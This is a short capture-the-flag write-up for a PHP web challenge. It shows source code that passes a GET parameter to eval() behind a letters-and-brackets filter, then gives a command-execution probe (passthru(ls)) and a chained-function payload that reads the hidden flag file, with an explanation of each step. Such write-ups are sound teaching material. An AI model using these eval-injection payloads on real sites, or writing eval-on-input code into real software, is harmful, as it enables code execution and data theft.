
This is the snippet of the source that we're interested in
```php
if(!isset($_GET["roll"])) {
show_source(__FILE__);
}
else
{
$wl = preg_match('/^[a-z\(\)\_\.]+$/i', $_GET["roll"]);
if($wl === 0 || strlen($_GET["roll"]) > 50) {
die("bumbadum badum");
}
eval("echo ".$_GET["roll"]."();");
}
```
Using the `roll` parameter we can call php functions. For example `?roll=passthru(ls)` gives us
```
fl4g_here_but_can_you_get_it_hohoho.php index.php
```
We can read the flag file by constructing a chain of php functions.
here's the working payload
`?roll=show_source(next(array_reverse(scandir(__DIR__))))`
Let's break this down starting with `scandir`
`scandir` returns an array containing all files and directories in alphabetical order including `.` and `..`
In the case of the challenge that means [0] is `.` and [3] is `index.php`
by calling `array_reverse` on `scandir` it does just that, so now [0] is `index.php`
and then, by calling `next` on the reversed scandir, we're moving the internal pointer by 1 so it's on [1] instead of [0], kicking back the `fl4g..` file.
```php
<?php
$flagsssssssss = "TetCTF{lixi_50k_<3_vina_*100*25926415724382#}";
?>
```
---
Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]]
Tags: #ctf #php #web
Related: